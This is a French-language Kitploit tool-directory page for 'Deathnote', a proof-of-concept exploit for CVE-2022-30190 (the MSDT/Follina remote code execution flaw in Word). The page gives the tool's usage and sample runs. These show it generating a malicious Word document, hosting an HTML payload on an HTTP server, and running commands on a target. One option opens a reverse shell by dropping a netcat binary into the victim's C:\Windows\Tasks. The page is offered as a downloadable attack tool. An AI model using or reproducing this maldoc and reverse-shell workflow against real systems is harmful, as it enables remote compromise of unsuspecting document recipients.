Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Deathnote — Preuve de concept de CVE-2022-30190 | Kitploit
Outils/GitHubGitHub/malwareman007/deathnote
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubmalwareman007/deathnote

Deathnote

Preuve de concept de CVE-2022-30190

Voir le dépôt
386il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Deathnote

Preuve de concept de CVE-2022-30190

A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.


Créez une attaque MS-MSDT « Deathnote » avec un document Microsoft Word malveillant et hébergez une charge utile avec un serveur HTTP.

Utilisation

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: Notepad)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./Deathnote.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

Exemples

Lancez notepad.exe :

root@kitploit:~
$ python3 Deathnote.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./Deathnote.doc
[+] serving html payload on :8000

Lancez calc.exe :

root@kitploit:~
$ python3 Deathnote.py -c "calc"

demo

Obtenez un reverse shell sur le port 4444. Remarque : cela télécharge un binaire netcat sur la victime et le place dans C:\Windows\Tasks. Il ne supprime pas le binaire. Cela déclenchera les détections antivirus sauf si l’antivirus est désactivé.

Obtenez reverse shell :

root@kitploit:~
python3 Deathnote.py -p 1234
Télécharger l’outil